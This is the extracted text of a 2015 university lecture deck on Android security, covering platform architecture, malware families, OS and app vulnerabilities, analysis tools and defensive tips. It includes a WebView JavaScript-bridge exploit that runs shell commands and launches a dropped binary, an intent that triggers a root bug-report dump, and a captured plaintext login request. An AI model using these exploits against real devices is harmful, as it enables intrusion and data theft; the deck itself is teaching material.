Introduc on — Android Market Share
Android climbed to 79 percent of smartphone market share in
2013. — Engadget
Android dominates 81 percent of world smartphone market.
— CNET
2
2CNET
Bob (CUHK) Android Security November 2, 2015 3 / 107
Slide 4
Slide 4 text
Introduc on — Android Malware
Terrifying new smartphone malware tracks your swipes to
steal your PIN.
— BGR
New Windows malware tries to infect Android devices
connected to PCs.
— PCWorld
First Android bootkit malware spotted; reportedly found on
over 350,000 mobile devices, most in China. — TNW
Bob (CUHK) Android Security November 2, 2015 4 / 107
Slide 5
Slide 5 text
Introduc on — Oldboot
Oldboot
The Oldboot has infected more than 500,000 devices in China.
Chinese retailers flashed this bootkit into the boot partition of
Android phones they sold.
Since the boot partition in Android will be loaded as a read-only
RAM disk, all existing antivirus solutions can’t effectively clean it
from infected devices.
The Oldboot will try to connect with its C&C servers, download
adware and install as system applications.
It can also execute arbitrary remote commands with root
permission.
Bob (CUHK) Android Security November 2, 2015 5 / 107
Slide 6
Slide 6 text
Outline I
1 Introduction
2 Background
How to Build an Android Application?
Application Fundamentals
APK File Structure
Android Architecture
Android Platform Security Architecture
Distribution Methods of Apps
3 Attacks
Android Malware
Malware Distribution
Vulnerabilities of Android OS
Android Apps Security
4 Analysis Tools
Bob (CUHK) Android Security November 2, 2015 6 / 107
Slide 7
Slide 7 text
Outline II
Tools in Android SDK
Static Analysis
Dynamic Analysis
Online Analysis
5 Defense
Obfuscation
Android NDK
Security Tips
6 Conclusion
Bob (CUHK) Android Security November 2, 2015 7 / 107
Slide 8
Slide 8 text
Outline
1 Introduction
2 Background
How to Build an Android Application?
Application Fundamentals
APK File Structure
Android Architecture
Android Platform Security Architecture
Distribution Methods of Apps
3 Attacks
4 Analysis Tools
5 Defense
Bob (CUHK) Android Security November 2, 2015 8 / 107
Slide 9
Slide 9 text
How to Build an Android Applica on?
3
3http://developer.android.com/tools/building/index.html
Bob (CUHK) Android Security November 2, 2015 9 / 107
Slide 10
Slide 10 text
How to Build an Android Applica on? — Android
Project
Android Project
|-- AndroidManifest.xml
|-- src/
| `-- package_name/
|
`-- MainActivity.java
`-- res/
|-- drawable-hdpi/
| `-- ic_launcher.png
|-- layout/
|
`-- activity_main.xml
`-- values/
AndroidManifest.xml
describes the fundamental
characteristics of the app and
defines each of its components.
sdk version
permission usage
src/: main srouce files in Java.
res/
drawable pictures
application layout in XML
string and color definitions in XML
Bob (CUHK) Android Security November 2, 2015 10 / 107
Slide 11
Slide 11 text
How to Build an Android Applica on? — Hello World
IDE: Eclipse with ADT plugin, Android Studio, Android SDK
public class MainActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
TextView tvHelloWorld = (TextView)findViewById(R.id.tv_hello_world);
tvHelloWorld.setText("Hello World");
}
}
Bob (CUHK) Android Security November 2, 2015 11 / 107
Slide 12
Slide 12 text
How to Build an Android Applica on? — Hello World
Layout: activity_main.xml
Bob (CUHK) Android Security November 2, 2015 12 / 107
Slide 13
Slide 13 text
How to Build an Android Applica on? — Hello World
AndroidManifest.xml
Bob (CUHK) Android Security November 2, 2015 13 / 107
Slide 14
Slide 14 text
How to Build an Android Applica on? — Details
A detailed look at the build process
1 The Android Asset Packaging Tool
(aapt) takes resource files and
compiles them.
2 aidl tool converts .aidl interfaces.
3 Compile all of Java code into
.class files by the Java Compiler.
4 Convert the .class files into Dalvik
byte code by the dex tool.
5 Package all non-compiled &
compiled resources into an .apk
file.
Bob (CUHK) Android Security November 2, 2015 14 / 107
Slide 15
Slide 15 text
How to Build an Android Applica on? — Details
4
A detailed look at the build process
(cont.)
6 Sign with a key before installation.
7 Align the file file by zipalign to
decrease memory usage.
4http://developer.android.com/tools/building/index.html
Bob (CUHK) Android Security November 2, 2015 15 / 107
Slide 16
Slide 16 text
Applica on Fundamentals
App components
Activities: an activity represent a single screen with a user
interface.
Services: a service is a component that runs in the background
to perform long-running operations or to perform work for
remote process.
Content providers: a content provider manager a shared set
of app data.
Broadcast receivers: a broadcast receiver is a component that
responds to system-wide broadcast announcements.
activating components: intent
Bob (CUHK) Android Security November 2, 2015 16 / 107
Slide 17
Slide 17 text
Applica on Fundamentals — Ac vity Lifecycle
Activity states
[7]
Bob (CUHK) Android Security November 2, 2015 17 / 107
Slide 18
Slide 18 text
Applica on Fundamentals — Ac vity Lifecycle
Activity lifecycle methods
[7]
Bob (CUHK) Android Security November 2, 2015 18 / 107
Slide 19
Slide 19 text
Applica on Fundamentals
The manifest file
declaring components
...
declaring components capabilities
declaring app requirements
Bob (CUHK) Android Security November 2, 2015 19 / 107
Slide 20
Slide 20 text
APK File Structure
APK files are a type of archive file, specifically in zip format
packages based on the JAR file format.
$ file facebook.apk
facebook.apk: Zip archive data,
at least v2.0 to extract
$ unzip facebook.apk
$ tree facebook
facebook/
|-- AndroidManifest.xml
|-- classes.dex
|-- resources.arsc
|-- lib/
|-- asset/
|-- res/
`-- META-INF/
|-- MANIFEST.MF
|-- CERT.RSA
`-- CERT.SF
Bob (CUHK) Android Security November 2, 2015 20 / 107
Slide 21
Slide 21 text
APK File Structure — Details
AndroidManifest.xml: compiled AndroidManifest.xml
(Android binary XML) which is not readable.
classes.dex: the classes compiled in the dex file format
understandable by the Dalvik virtual machine.
META-INF: certificate SHA-1 digest information.
lib: native library for different platforms (armeabi, x86, mips).
Bob (CUHK) Android Security November 2, 2015 21 / 107
Slide 22
Slide 22 text
Android Architecture
Bob (CUHK) Android Security November 2, 2015 22 / 107
Slide 23
Slide 23 text
Android Architecture
Linux Kernel
drivers for hardware, networking, file system access and
inter-process communication
Libraries: native libraries, daemons and services (written in C
or C++)
Android Runtime
Dalvik Virtual Machine
Supported core libraries
Application Framework
framework services and libraries (written mostly in Java)
most framework code executes in a Dalvik virtual machine.
Applications: pre-installed applications & applications from
marketplaces.
written in Java, executing in Dalvik VM.
Bob (CUHK) Android Security November 2, 2015 23 / 107
Slide 24
Slide 24 text
Android Architecture — Dalvik Virtual Machine
Dalvik VM is register based Java Virtual Machine.
Optimized to use less space.
Dalvik byte code (.dex file) rather than Java byte code (.class).
More… [6]
Bob (CUHK) Android Security November 2, 2015 24 / 107
Slide 25
Slide 25 text
Android Pla orm Security Architecture
To achieve protecting user data, protecting system
resources(including the network), providing application isolation,
Android provides these key security features:
Robust security at the OS level through the Linux kernel
Mandatory application sandbox for all applications
Secure interprocess communication
Application signing
Application-defined and user-granted permissions
Bob (CUHK) Android Security November 2, 2015 25 / 107
Slide 26
Slide 26 text
Android Pla orm Security Architecture — Sandbox
multi-user Linux system in
which each app is a different
user.
the system assigns each app
a unique Linux user ID.
only the user ID assigned to
that app can access
resources.
each process has its own VM.
every app runs in its own
Linux process. [10
Bob (CUHK) Android Security November 2, 2015 26 / 107
Slide 27
Slide 27 text
Android Pla orm Security Architecture —
Inter-process Communica on
ICC: Inter-component communication
IPC: Inter-process communication
Why IPC?
Each process in its memory address space.
Provides data isolation.
Prevents harmful interaction.
Bob (CUHK) Android Security November 2, 2015 27 / 107
Slide 28
Slide 28 text
Android Pla orm Security Architecture —
Inter-component Communica on
IPC describes the mechanism how different types of android
components are communicated.
Component View of ICC: Intent between Activity, Service, Content
Provider, Broadcast Receiver
[5]
Bob (CUHK) Android Security November 2, 2015 28 / 107
Android Pla orm Security Architecture —
Inter-process Communica on
ServiceManager: manages registered services
(registered/delete/query).
Service provider: register to ServiceManager
Service user: request service from ServiceManager, and
execute remote services.
Bob (CUHK) Android Security November 2, 2015 30 / 107
Slide 31
Slide 31 text
Android Pla orm Security Architecture —
Fine-grained Permission Mechanism
accessing protected APIs
Camera functions
Location data (GPS)
Bluetooth functions
Telephony functions
SMS/MMS functions
Network/data connections
declaring in AndroidManifest.xml explicitly.
Bob (CUHK) Android Security November 2, 2015 31 / 107
Slide 32
Slide 32 text
Android Pla orm Security Architecture — Applica on
Signing
The Android system requires that all installed applications be
digitally signed with a certificate whose private key is held by the
application’s developer.
All application must be signed.
A special debug key for test and debug.
Sign with your private key when publishing.
Self-signed certificates, no certificate authority is need.
Expiration date.
Keytool & Jarsigner
zipalign
Bob (CUHK) Android Security November 2, 2015 32 / 107
Slide 33
Slide 33 text
Android Pla orm Security Architecture — Applica on
Signing
Motivations of APK signing.
Update apps.
Ensure application is unmodified.
Data shared between applications from same developers.
Bob (CUHK) Android Security November 2, 2015 33 / 107
Slide 34
Slide 34 text
Distribu on Methods of Apps
Google Play (official market)
More secure, but still have malware.
Third-party markets/forums
popular in China
less limitations
a number of malware
Bob (CUHK) Android Security November 2, 2015 34 / 107
Slide 35
Slide 35 text
Outline
1 Introduction
2 Background
3 Attacks
Android Malware
Malware Distribution
Vulnerabilities of Android OS
Android Apps Security
4 Analysis Tools
5 Defense
Bob (CUHK) Android Security November 2, 2015 35 / 107
Slide 36
Slide 36 text
Subsection 1
Android Malware
Slide 37
Slide 37 text
Android Malware — Introduc on
There is a massive growth in the volume of malware families
and samples. — Symantec
[12]
Bob (CUHK) Android Security November 2, 2015 37 / 107
Slide 38
Slide 38 text
Android Malware — Introduc on
Top ten app categories with the highest percentage of malware.
On third-party app stores, the most dangerous is the Games/Arcade
& Action category followed by the Photography category.
[12]
Bob (CUHK) Android Security November 2, 2015 38 / 107
Slide 39
Slide 39 text
Android Malware — Introduc on
Third-party app stores hosting the most malware from January to
June 2013.
Although malware slips into Google Play, most malware is hosted
on third-party app stores. There are also stores that only host
malware.
[12]
Bob (CUHK) Android Security November 2, 2015 39 / 107
Slide 40
Slide 40 text
Android Malware — Characteriza on
Characterized by
Malware installation
Activation
Malicious payloads
Bob (CUHK) Android Security November 2, 2015 40 / 107
Slide 41
Slide 41 text
Android Malware — Characteriza on
Malware installation
Repackaging
Update attacks
Drive-by Download
Others
Bob (CUHK) Android Security November 2, 2015 41 / 107
Slide 42
Slide 42 text
Android Malware — Characteriza on
Repackaged Malware
Characteristics of repackaged malware
one of the most common techniques malware
piggyback malicious payloads into popular applications
Steps
download apps
disassemble apk file
smali/baksmali
apktool
IDA Pro
…
enclose malicious payloads
re-assemble and submit to official or alternative Android
markets.
Bob (CUHK) Android Security November 2, 2015 42 / 107
Slide 43
Slide 43 text
Android Malware — Characteriza on
Repackaged Malware
Case study — Flappy Bird [14]
massively popular small
game on smartphone
exactly the same appearance
as the original version
fake Android Flappy Bird
Premium Service Abusers —
apps that send messages to
premium numbers
causing unwanted charges to
vimctims’ phone billing
especially rampant in app
markets in Russia and
Vietnam
Bob (CUHK) Android Security November 2, 2015 43 / 107
Slide 44
Slide 44 text
Android Malware — Characteriza on
Repackaged Malware
Case study — Flappy Bird [14]
read/send text message permission
which is not required in the original
version
send messages to premium
numbers (8777 & 8738)
connects to a C&C server to receive
instructions
information leakage
Other game repackaged malware
Candy Crush
Angry Bird Space
Temple Run 2
Bob (CUHK) Android Security November 2, 2015 44 / 107
Slide 45
Slide 45 text
Android Malware — Characteriza on
Update Attack
repackage popular apps
do not enclose the payload as a whole
piggyback an update component tha will fetch or download the
malicious payloads at runtime
Static scanning?
Bob (CUHK) Android Security November 2, 2015 45 / 107
Slide 46
Slide 46 text
Android Malware — Characteriza on
Update Attack
Case Study — BaseBridge
update dialogue
saying that a new
version is available
malicious payload will
then be installed
[15]
Bob (CUHK) Android Security November 2, 2015 46 / 107
Slide 47
Slide 47 text
Android Malware — Characteriza on
Drive-by Download
entice users to download “interesting” or “feature-rich” apps
GGTracker in-app advertisement
Jifake QR code
Others
spyware
fake apps
intentional malicious apps
rely on the root privilege
Bob (CUHK) Android Security November 2, 2015 47 / 107
Slide 48
Slide 48 text
Android Malware — Characteriza on
Characterized by Activiation
BOOT_COMPLETED
SMS_RECEIVED
ACTION_MAIN
events combination
Bob (CUHK) Android Security November 2, 2015 48 / 107
Slide 49
Slide 49 text
Android Malware — Characteriza on
Characterized by Malicious Payloads
privilege escalation
remote control
C&C server
botnet
financial charge
subscribe to premium-rate services
information collection
SMS messages
phone numbers
email address
installed package list?
Bob (CUHK) Android Security November 2, 2015 49 / 107
Slide 50
Slide 50 text
Android Malware — Evolu on
From naive repakcaging to sophasticated obfuscation
DroidKungfu
root exploits
C&C servers
shadow playloads: apk package
obfuscation, JNI
Bob (CUHK) Android Security November 2, 2015 50 / 107
Slide 51
Slide 51 text
Android Malware — Evolu on
Bleeding-edge malware
AVPasser: anti-detection
Report: http://contagiominidump.blogspot.hk/2014/
01/android-oldboot-mouabads.html
Oldboot: bootkit on Android
“modify devices’ boot partition and booting script file to launch
system service and extract malicious application during the
early stage of system’s booting”
“Due to the special RAM disk feature of Android devices’ boot
partition, all current mobile antivirus product in the world can’t
completely remove this Trojan or effectively repair the system.”
http://blogs.360.cn/360mobile/2014/01/17/
oldboot-the-first-bootkit-on-android/
Bob (CUHK) Android Security November 2, 2015 51 / 107
Slide 52
Slide 52 text
Android Malware — Distribu on
[8]
Bob (CUHK) Android Security November 2, 2015 52 / 107
Slide 53
Slide 53 text
Subsection 3
Vulnerabili es of Android OS
Slide 54
Slide 54 text
Permission Abuses
Android Permission Mechanism
request permissions before
installation
once accepted, never ask you again
no idea about when/where/how to
use these permissions
Permission abuses: 37 permissions for a
map application.
Bob (CUHK) Android Security November 2, 2015 54 / 107
Slide 55
Slide 55 text
Capabili es Leaks
Permission re-delegation
Malware do not have
permission to send text.
Legitimate application has
permission.
Legitimate application
expose their component to
other without verification
accidentally.
Malware utilize the
permission of deputy
(legitimate application) to
complete the malicious
behaviors.
[4]
Bob (CUHK) Android Security November 2, 2015 55 / 107
Slide 56
Slide 56 text
Collusion A ack
malicious applications collude to combine their permissions
perform actions beyond their individual pervileges
Bob (CUHK) Android Security November 2, 2015 56 / 107
Slide 57
Slide 57 text
WebView Vulnerabili es
What is WebView?
embedded browser in side an app
web application for cross-platform
HTML5 and JavaScript
How to enable apps to interact with the web content?
Apps -> Web pages
apps can invoke JavaScript code into webpages (e.g., load a
JavaScript into page)
apps can monitor and intercept the events occurred within web
pages (e.g., onPageFinished event)
Web pages -> Apps
apps can register interfaces to WebView (e.g., File operations
interface)
JavaScript code can invoke these interface (e.g., JavaScript can
read/write internal files)
Bob (CUHK) Android Security November 2, 2015 57 / 107
Slide 58
Slide 58 text
WebView Vulnerabili es — Thread Models
[9]
Bob (CUHK) Android Security November 2, 2015 58 / 107
Slide 59
Slide 59 text
WebView Vulnerabili es — Case Study
Abusing WebView JavaScript Bridges
function execute(cmdArgs) {
return SmokeyBear.getClass()
.forName("java.lang.Runtime")
.getMethod("getRuntime",null)
.invoke(null,null)
.exec(cmdArgs);
}
execute(["/system/bin/sh","-c","echo '"+armBinary+
"' > /data/data/com.example.webviewhack/armB2"]);
execute(["chmod","755","/data/data/com.example.webviewhack/armB2"]);
var p = execute(["/data/data/com.example.webviewhack/armB2",
"192.168.1.116","/mnt/sdcard"]);
document.write(getContents(p.getInputStream()));
Bob (CUHK) Android Security November 2, 2015 59 / 107
Slide 60
Slide 60 text
Root Exploits
What is rooting?
Linux root user
get around any restrictions
Why would you root?
access entire file system
install special apps
flash custom ROMs
Why wouldn’t you root?
void your warranty
brick your phone
security risk: you may disclose root privilege to malware
accidentally
Bob (CUHK) Android Security November 2, 2015 60 / 107
Slide 61
Slide 61 text
Root Exploits
How to gain root in Android?
Linux kernel exploits: CVE-2012-0056, CVE-2009-2692.
(http://www.cvedetails.com/)
Android exploits: GingerBreak, zergRush.
Third-party firmware with root privilege.
Bob (CUHK) Android Security November 2, 2015 61 / 107
Slide 62
Slide 62 text
Android Apps Security5
data storing
data transportation
password and authentication
component capability leaks
others
5Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013.
Bob (CUHK) Android Security November 2, 2015 62 / 107
Slide 63
Slide 63 text
Android Apps Security — Data storing
Data Storing External storage (SD card):
no permission management
read/write anything on external storage
Internal storage (SQLite, XML, File):
protected by user id
need root to access
Bob (CUHK) Android Security November 2, 2015 63 / 107
Slide 64
Slide 64 text
Android Apps Security — Data storing
Attack Surface: storing privacy on SD card.
Example: backup data, IM messages, SNS data
Problem: can be accessed by others
Consequence: privacy leakage
Solution: encryption
Bob (CUHK) Android Security November 2, 2015 64 / 107
Slide 65
Slide 65 text
Android Apps Security — Data storing
Attack Surface: storing dynamic payloads on SD card.
Example: store downloaded APK, DEX and JAR on SD card and
load/install in runtime
Problem: manipulated by others
Consequence: phishing, malware, privacy
Solution: check authority and integrity before installation
Bob (CUHK) Android Security November 2, 2015 65 / 107
Slide 66
Slide 66 text
Android Apps Security — Data storing
Attack Surface: storing configurations on SD card.
Example: storing configuration data in plain text
Problem: manipulated by others
Consequence: phishing, malware, privacy leakage, MITM
attack, SQL injection
Solution: internal, encryption, check authority and integrity
before using
Bob (CUHK) Android Security November 2, 2015 66 / 107
Slide 67
Slide 67 text
Android Apps Security — Data storing
Attack Surface: world readable/writeable internal file
Example: sharing data between apps using
Context.MODE_WORLD_READABLE ||
CONTEXT.MODE_WORLD_WRITEABLE
Problem: manipulated by others
Consequence: privacy leakage
Solution: Content Provider, do not set world readable and
writeable for internal data
Bob (CUHK) Android Security November 2, 2015 67 / 107
Slide 68
Slide 68 text
Android Apps Security — Data storing
Attack Surface: storing privacy in internal storage
Example: password, credit card number in plain text
Problem: root to access
Consequence: privacy leakage
Solution: do not store this information, encryption, other
authentication methods
Bob (CUHK) Android Security November 2, 2015 68 / 107
Slide 69
Slide 69 text
Android Apps Security — Data transporta on
Attack Surface: plain text transportation.
Example: plain text in transportation for password, session
key and privacy
Problem: open WiFi, sniffing
Consequence: privacy leakage
Solution: TLS/SSL
Bob (CUHK) Android Security November 2, 2015 69 / 107
Slide 70
Slide 70 text
Example
POST /api/checkaccount HTTP/1.1
User-Agent: MomoChat/1.11build Android/12 (LT18i; Android 2.3.4;
zh_CN)
Content-Length: 249
Content-Type: application/x-www-form-urlencoded
Host: www.immomo.com:80
Connection: Keep-Alive
uid=85dab7d268769df46abe111a82976931&phone_netWork=
2&screen=480x854&model=LT18i&rom=2.3.4&phone_type=G
SM&device_type=android&account=xxxxxx&mac=5c%3Ab5%3
A24%3A09%3Ae1%3A58&market_source=1&buildnumber=4.0.
2.A.0.58%2Fxf_v3w&password=xxxxxx&version=12
Bob (CUHK) Android Security November 2, 2015 70 / 107
Slide 71
Slide 71 text
Android Apps Security — Data transporta on
Attack Surface: SSL certificate
Example: trust all certificate
Problem: MITM attack
Consequence: privacy leakage
Solution: CA, keystore
Bob (CUHK) Android Security November 2, 2015 71 / 107
Slide 72
Slide 72 text
Android Apps Security — Data transporta on
Attack Surface: SMS message
Example: use SMS message to register, password
Problem: send, read, hijack
Consequence: privacy leakage
Solution: HTTPS
Bob (CUHK) Android Security November 2, 2015 72 / 107
Slide 73
Slide 73 text
Android Apps Security — Password
Attack Surface:
weak password, short password, base64, XOR
session key: hash(account+password)
IMEI, IMSI
Bob (CUHK) Android Security November 2, 2015 73 / 107
Slide 74
Slide 74 text
Android Apps Security — Capability Leaks
Attack Surface: Intent
call B => execution
call B with parameters => results
call B => results
fake B => access A’s data
fake B => triggered by A, phishing
Bob (CUHK) Android Security November 2, 2015 74 / 107
Slide 75
Slide 75 text
Example
Bob (CUHK) Android Security November 2, 2015 75 / 107
Slide 76
Slide 76 text
Example
if ("284".equals(paramIntent.getData().getHost())) {
asyncExecute(new Runnable() {
public void run() {
try {
String str = CitBroadcastReceiver.TAG;
String[] arrayOfString = new String[3];
arrayOfString[0] = "bugreport";
arrayOfString[1] = ">";
arrayOfString[2] = m_logFileName;
CitUtils.rootExecProgram(str, arrayOfString, true);
}
}
});
Bob (CUHK) Android Security November 2, 2015 76 / 107
Slide 77
Slide 77 text
Example
Attack:
Intent intent = new Intent();
intent.setAction("android.provider.Telephony.SECRET_CODE");
intent.setData(Uri.parse("android_secret_code://284"));
sendBroadcast(intent);
execute bugreport in root priveledge
dump system infor into SD Card
Bob (CUHK) Android Security November 2, 2015 77 / 107
Tools in Android SDK
adb: Android Debug Bridge (adb) is a versatile command line tool
that lets you communicate with an emulator instance or connected
Android-powered device.
$ adb install ...apk
$ adb shell
$ adb pull
$ adb push
logcat: The Android logging system provides a mechanism for
collecting and viewing system debug output.
$ adb logcat
log information ...
Others:
aapt: Android Asset Packaging Tool
keytool & jarsigner: sign your application
zipalign: align the final pacakge
Bob (CUHK) Android Security November 2, 2015 81 / 107
Slide 82
Slide 82 text
Sta c Analysis — Fundamentals
Recall
.java -> .class -> classes.dex
zip classes.dex into apk file with other resources
dex file is bytecode file for Dalvik VM
Reverse engineer?
.dex format
bytecode format
instruction formats
specifications: https://source.android.com/devices/
tech/dalvik/dalvik-bytecode.html
Bob (CUHK) Android Security November 2, 2015 82 / 107
Slide 83
Slide 83 text
Sta c Analysis — smali/baksmali
smali/baksmali: https://code.google.com/p/smali/
smali/baksmali is an assembler/disassembler for the dex format
used by dalvik, Android’s Java VM implementation.
Bob (CUHK) Android Security November 2, 2015 83 / 107
Slide 84
Slide 84 text
Sta c Analysis — smali/baksmali
HelloWorld application
$ unzip HelloWorld.apk -d hello_world
Archive: HelloWorld.apk
inflating: hello_world/res/layout/activity_main.xml
inflating: hello_world/classes.dex
...
$ java -jar baksmali.jar hello_world/classes.dex
$ tree
com
`-- example
`-- helloworld
|-- BuildConfig.smali
|-- MainActivity.smali
|-- R$attr.smali
|-- R$dimen.smali
|-- R$drawable.smali
|-- R$id.smali
|-- R$layout.smali
|-- R$menu.smali
|-- R.smali
|-- R$string.smali
`-- R$style.smali
Bob (CUHK) Android Security November 2, 2015 84 / 107
Slide 85
Slide 85 text
Sta c Analysis — android-apktool
apktool is based on smali/baksmali.
https://code.google.com/p/android-apktool/
It is a tool for reverse engineering 3rd party, closed, binary
Android apps.
It can decode resources to nearly original form and rebuild
them after making some modifications; it makes possible to
debug smali code step by step.
Also it makes working with app easier because of project-like
files structure and automation of some repetitive tasks like
building apk, etc.
Usage of apktool
d[ecode] [OPTS] []
b[uild] [OPTS] [] []
Bob (CUHK) Android Security November 2, 2015 85 / 107
Slide 86
Slide 86 text
Sta c Analysis — apktool
HelloWorld application
$ apktool d HelloWorld.apk
$ cat MainActivity.smali
.class public Lcom/example/helloworld/MainActivity;
.super Landroid/app/Activity;
.source "MainActivity.java"
...
.method protected onCreate(Landroid/os/Bundle;)V
...
const-string v1, "Hello World"
invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang
...
Change "Hell World" to "Hey Android".
Bob (CUHK) Android Security November 2, 2015 86 / 107
Slide 87
Slide 87 text
Sta c Analysis — apktool
HelloWorld application
$ apktool b HelloWorld
$ file HelloWorld/dist/HelloWorld.apk
HelloWorld/dist/HelloWorld.apk: Zip archive data, at least v2.0 to extract
$ jarsigner ...
$ zipalign ...
$ adb install HelloWorld.apk
Bob (CUHK) Android Security November 2, 2015 87 / 107
Slide 88
Slide 88 text
Sta c Analysis — dex2jar & jd-gui
dex2jar: reverse dex to
class and package into jar.
https://code.google.
com/p/dex2jar/
jd-gui: JD-GUI is a
standalone graphical utility
that displays Java source
codes of “.class” files.
http://jd.benow.ca/
Bob (CUHK) Android Security November 2, 2015 88 / 107
Slide 89
Slide 89 text
Sta c Analysis — androguard
Androguard is mainly a tool written in python to play with :
Dex/Odex (Dalvik virtual machine) (.dex) (disassemble,
decompilation),
APK (Android application) (.apk),
Android’s binary xml (.xml),
Android Resources (.arsc).
Bob (CUHK) Android Security November 2, 2015 89 / 107
Slide 90
Slide 90 text
Sta c Analysis — androguard
Features:
map DEX/ODEX/AP-
K/AXML/ARSC format
into Python objects
disassemble,
decompilation and
modification of
DEX/ODEX/APK
static analysis
ipython/Sublime text
editor
similarity
measurement
visulizaion
Bob (CUHK) Android Security November 2, 2015 90 / 107
Slide 91
Slide 91 text
Dynamic Analysis — DroidBox
DroidBox is developed to offer dynamic
analysis of Android applications.
Hashes for the analyzed package
Incoming/outgoing network data
File read and write operations
Started services and loaded classes
through DexClassLoader
Information leaks via the network,
file and SMS
Circumvented permissions
Cryptography operations
performed using Android API
Listing broadcast receivers
Sent SMS and phone calls
Bob (CUHK) Android Security November 2, 2015 91 / 107
Slide 92
Slide 92 text
Dynamic Analysis — TaintDroid
TaintDroid: Tracking how apps
use sensitive information
required integrating our software
into the Android platform at a low
level. http://appanalysis.
org/index.html
Demo: http:
//www.youtube.com/
watch?v=qnLujX1Dw4Y
Bob (CUHK) Android Security November 2, 2015 92 / 107
Slide 93
Slide 93 text
Online Analysis
Anubis: generate online analysis report.
https://anubis.iseclab.org/
VirusTotal: cloud detection (almost all detection engines)
https://www.virustotal.com/
Bob (CUHK) Android Security November 2, 2015 93 / 107
Obfusca on — ProGuard
ProGuard is a free Java class file shrinker, optimizer, obfuscator,
and preverifier.
It detects and removes unused classes, fields, methods, and
attributes.
It optimizes bytecode and removes unused instructions.
It renames the remaining classes, fields, and methods using
short meaningless names.
ProGuard can be used for Android obfuscation, and is integrated in
Android build system.
Bob (CUHK) Android Security November 2, 2015 95 / 107
Slide 96
Slide 96 text
Obfusca on — ProGuard
To enable ProGuard, set the proguard.config property in the
/project.properties file.
proguard.config=proguard.cfg
Bob (CUHK) Android Security November 2, 2015 96 / 107
Android NDK
Android NDK: a toolset that allows you to implement parts of your
app using native-code languages such as C and C++.
http:
//developer.android.com/tools/sdk/ndk/index.html
difficult to reverse engineer
more complex
less portable
Bob (CUHK) Android Security November 2, 2015 98 / 107
Slide 99
Slide 99 text
Security Tips — Storing Data
Using internal storage: By default, files on internal storage are
accessible only to your app.
avoid using the MODE_WORLD_WRITEABLE or
MODE_WORLD_READABLE modes
cannot limit data access to particular applications
cannot control data format
encrypt sensitive data
Bob (CUHK) Android Security November 2, 2015 99 / 107
Slide 100
Slide 100 text
Security Tips — Storing Data
Using external storage: Files on external storage (SD Cards) are
globally readable and writable.
perform input validation
avoid putting dynamic payload on external storage
verify before loading
Bob (CUHK) Android Security November 2, 2015 100 / 107
Slide 101
Slide 101 text
Security Tips — Storing Data
Using content providers: offer a structured storage mechanism
that can be limited to your own application or exported to allow
access by other applications.
mark android:exported=false
android:protectionLevel=signature
Bob (CUHK) Android Security November 2, 2015 101 / 107
Slide 102
Slide 102 text
Security Tips from developer.android.com [2]
Storing Data
Using permissions
requesting permissions
creating permissions
Using networking
Using IP networking
Using telephony networking
Performing input validation
Handling user data
Using WebView
Using cryptography
Using IPC
Dynamically loading code
Security in a VM
Security in native code
Bob (CUHK) Android Security November 2, 2015 102 / 107
Slide 103
Slide 103 text
Conclusion I
1 Introduction
2 Background
How to Build an Android Application?
Application Fundamentals
APK File Structure
Android Architecture
Android Platform Security Architecture
Distribution Methods of Apps
3 Attacks
Android Malware
Malware Distribution
Vulnerabilities of Android OS
Android Apps Security
4 Analysis Tools
Bob (CUHK) Android Security November 2, 2015 103 / 107
Slide 104
Slide 104 text
Conclusion II
Tools in Android SDK
Static Analysis
Dynamic Analysis
Online Analysis
5 Defense
Obfuscation
Android NDK
Security Tips
6 Conclusion
Bob (CUHK) Android Security November 2, 2015 104 / 107
Slide 105
Slide 105 text
References I
Qihoo 360. http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-
first-bootkit-on-android/.
Android. http://developer.android.com/training/articles/security-
tips.html.
William Enck, Peter Gilbert, Byung-Gon Chun, Landon P Cox, Jaeyeon Jung,
Patrick McDaniel, and Anmol Sheth. “TaintDroid: An Information-Flow Tracking
System for Realtime Privacy Monitoring on Smartphones.” In: OSDI. Vol. 10. 2010,
pp. 1–6.
Adrienne Porter Felt, Helen J Wang, Alexander Moshchuk, Steve Hanna, and
Erika Chin. “Permission Re-Delegation: Attacks and Defenses.” In: USENIX Security
Symposium. 2011.
Jim Huang. Android IPC Mechanism.
http://www.slideshare.net/jserv/android-ipc-mechanism.
Bob (CUHK) Android Security November 2, 2015 105 / 107
Slide 106
Slide 106 text
References II
Jim Huang. Understanding the Dalvik Virtual Machine.
http://www.slideshare.net/jserv/understanding-the-dalvik-
virtual-machine.
Activity Lifecycle. Activity Lifecycle. http://docs.xamarin.com/guides/android/
application_fundamentals/activity_lifecycle/.
Lookout. Mobile Threats, Made to Measure. https://www.lookout.com/static/
ee_images/Mobile_Threats_Made_to_Measure_Lookout_Report_2013.pdf.
Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin. “Attacks on WebView
in the Android system”. In: Proceedings of the 27th Annual Computer Security
Applications Conference. ACM. 2011, pp. 343–352.
C. Enrique Ortiz. Understanding security on Android.
http://www.ibm.com/developerworks/library/x-androidsecurity/.
Slashdot. http://beta.slashdot.org/submission/3273305/security-
researcher-found-the-first-android-bootkit-in-the-wild.
Bob (CUHK) Android Security November 2, 2015 106 / 107
Slide 107
Slide 107 text
References III
Symantec. Mobile Adware and Malware Analysis.
http://www.symantec.com/content/en/us/enterprise/media/security_
response/whitepapers/madware_and_malware_analysis.pdf.
Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013.
Veo Zhang. Trojanized Flappy Bird Comes on the Heels of Takedown by App Creator.
http://blog.trendmicro.com/trendlabs-security-
intelligence/trojanized-flappy-bird-comes-on-the-heels-of-
takedown-by-app-creator/.
Yajin Zhou and Xuxian Jiang. “Dissecting android malware: Characterization and
evolution”. In: Security and Privacy (SP), 2012 IEEE Symposium on. IEEE. 2012,
pp. 95–109.
Bob (CUHK) Android Security November 2, 2015 107 / 107